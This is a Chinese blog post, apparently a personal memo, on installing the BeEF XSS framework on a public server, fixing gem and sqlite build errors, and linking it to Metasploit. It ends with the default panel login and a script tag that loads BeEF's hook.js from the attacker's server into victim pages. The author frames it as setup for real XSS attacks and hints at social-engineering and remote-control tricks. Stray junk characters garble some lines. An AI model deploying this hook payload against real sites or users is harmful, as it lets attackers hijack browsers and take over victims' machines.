beef xss framework 之前就玩过,之前也总结过,但是当时觉得这玩意太简单了,安装的几个问题也不大就没有写教程,指到今天又要装beef xss的时候我翻了下我以前记的笔记,懵逼了:

beef xss

笔记记的过于简单,直接提醒自己看README,现在连下载都要百度,安装的时候报的错也要重新百度,所以这次干脆总结下,也算是给自己的备忘以下。

另外,可能很多朋友又要说,这玩意kali或者bt直接自带,哪还需要安装教程。

这类人我就不明白了,真实xss渗透的时候难道你还是内网?难道还得路由器转发?外网服务器难道不是必须品?

很多渗透组件,metasploit,nessus,beef等等组件不都得手动装吗,难道天天抱个本地kali自己日自己吗。

废话少说,进入正题。以下linux命令就不细说了,如果是debian系统,如kali,则用apt-get install安装,如有其他疑问的请自行百度。

beef xss framework下载

git clone https://github.com/beefproject/beef

安装及问题

gem install bundler

第一个错

-bash: gem: command not found

解决方法:yum install gem

第二个错

/System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/bin/ruby
extconf.rb
mkmf.rb can't find header files for ruby at
/System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/ruby.h

解决方法:yum install ruby-devel

bundle install

第三个错

An error occurred while installing do_sqlite3 (0.10.17), and Bundler cannot continue.
Make sure that `gem install do_sqlite3 -v '0.10.17'` succeeds before bundling.
提示安装sqlite3错误,
解决方法:
需要手动下载sqlite源码包编译安装。
直接下载地址:http://www.sqlite.org/2016/sqlite-autoconf-3140200.tar.gz
下载好后,直接三部曲:./configure&&make&&make install
装好sqllite3后再重新:
bundle install

没有报错则安装成功

链接msf

打开config.yaml这个文件,我们需要把里面关于metasploit的那一项开启如下图:6 r  c% w3 z" Z6 L4 Q" q
3.png " E" m* m1 N) h4 r% ]  l
将metasploit的enable的项改成true就可以了,然后保存退出。下一步我们需要进入beEF下面的extensions/metasploit目录。如下图:! R2 Y0 I, }8 X7 E$ Z6 R1 K
4.png 
打开这个config.yaml文件,并把这几个地方修改下:) ~. G  Z2 p' C, @
5.png 
这个地方ip改为你本机ip,不要用127.0.0.1。下面的路径为metasploit的路径,然后保存。  ]* q3 w5 _) i6 _7 M
然后把metasploit的服务开启,在命令行下用msfconsole把控制台打开,接着加载beEF。所用命令为:“load msgrpc ServerHost=192.169.60.19 Pass=abc123”" M, L/ J0 M" L1 m0 Y/ r
6.png

启动beef

启动很简单,直接./beef就可以,

如果后台运行可以:nohup ./beef &

使用方法

http://*****:3000/ui/panel

默认密码:beef  beef

 如需修改密码:beef xss framework修改默认登录密码

脚本地址:<script src=http://*****:3000/hook.js></script>

到这里不用再教了吧

beef xss

 

有机会分享几个人使用的beef 猥琐社工+远控套路,真是有点舍不得啊~